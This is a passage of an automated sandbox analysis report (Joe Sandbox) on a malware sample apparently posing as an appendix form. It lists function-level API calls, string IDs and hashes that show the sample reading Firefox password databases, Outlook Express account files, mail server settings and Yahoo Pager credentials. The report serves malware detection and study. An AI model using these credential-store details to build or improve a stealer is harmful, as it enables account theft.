                                                                                                              Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                              • String ID: 0$6
                                                                                                              • API String ID: 2300387033-3849865405
                                                                                                              • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                              • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                              • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                              Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _mbscat$memsetsprintf
                                                                                                              • String ID: %2.2X
                                                                                                              • API String ID: 125969286-791839006
                                                                                                              • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                              • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                              • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                              • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                              Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                              • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                              • String ID: ACD
                                                                                                              • API String ID: 1886237854-620537770
                                                                                                              • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                              • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                              • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                              • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                              Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004091EC
                                                                                                              • sprintf.MSVCRT ref: 00409201
                                                                                                                • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                              • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                              • String ID: caption$dialog_%d
                                                                                                              • API String ID: 2923679083-4161923789
                                                                                                              • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                              • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                              • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                              • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                              Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                              • memset.MSVCRT ref: 00410246
                                                                                                              • memset.MSVCRT ref: 00410258
                                                                                                                • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                              • memset.MSVCRT ref: 0041033F
                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                              • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 3974772901-0
                                                                                                              • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                              • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                              Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • wcslen.MSVCRT ref: 0044406C
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                              • strlen.MSVCRT ref: 004440D1
                                                                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 577244452-0
                                                                                                              • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                              • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                              Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                              • _strcmpi.MSVCRT ref: 00404518
                                                                                                              • _strcmpi.MSVCRT ref: 00404536
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _strcmpi$memcpystrlen
                                                                                                              • String ID: imap$pop3$smtp
                                                                                                              • API String ID: 2025310588-821077329
                                                                                                              • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                              • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                              Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C02D
                                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,771B0A60), ref: 00408EBE
                                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408E31
                                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                              • API String ID: 2726666094-3614832568
                                                                                                              • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                              • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                              Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 2014771361-0
                                                                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                              Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$memcpy
                                                                                                              • String ID: global-salt$password-check
                                                                                                              • API String ID: 231171946-3927197501
                                                                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                              Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                              • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                              Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040644F
                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 438689982-0
                                                                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                              Function 004032B7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                              • memset.MSVCRT ref: 0040330B
                                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                              • strchr.MSVCRT ref: 0040335A
                                                                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                              • strlen.MSVCRT ref: 0040339C
                                                                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                              • String ID: Personalities
                                                                                                              • API String ID: 2103853322-4287407858
                                                                                                              • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                              • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                              Function 00444551 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00444573
                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                              • API String ID: 1830152886-1703613266
